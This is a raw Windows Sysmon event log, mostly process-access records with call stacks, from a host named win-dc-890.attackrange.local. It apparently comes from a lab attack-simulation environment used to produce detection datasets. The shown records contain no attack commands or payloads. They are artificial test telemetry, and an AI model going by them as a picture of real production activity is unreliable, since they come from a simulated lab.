08:05:40.781{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.781{466BC892-F7D4-60EB-D97D-00000000CF01}9188396C:\Windows\System32\consent.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x70C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\consent.exe+1452|C:\Windows\System32\consent.exe+3ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.765{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC9D132D802C0EF51042191C1688C0E9,SHA256=D855EEF958F8E76394B14AF2DB2C4F66738E6C8B2D1D083C73250EAB198DE5A7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.765{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.765{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.681{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.681{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.663{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.663{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.663{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.663{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.663{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D97D-00000000CF01}9188C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+2c4f|c:\windows\system32\appinfo.dll+4026|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.478{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.441{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001053886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.441{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001053885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.394{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.379{466BC892-32D3-60E8-770B-00000000CF01}6356764C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.379{466BC892-32D3-60E8-770B-00000000CF01}6356764C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.379{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdl
l.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.308{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001053880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.294{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.294{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7D4-60EB-D87D-00000000CF01}4760C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:40.277{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+36f20|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+32f80|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+22534|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\SharedStartModel.dll+77f37|C:\Windows\System32\SharedStartModel.dll+b2d9d|C:\Windows\System32\SharedStartModel.dll+b2285|C:\Windows\System32\SharedStartModel.dll+b2801|C:\Windows\system32\windows.cortana.Desktop.dll+a80e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Window
s\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f 10341000x80000000000000001053875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:40.277{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
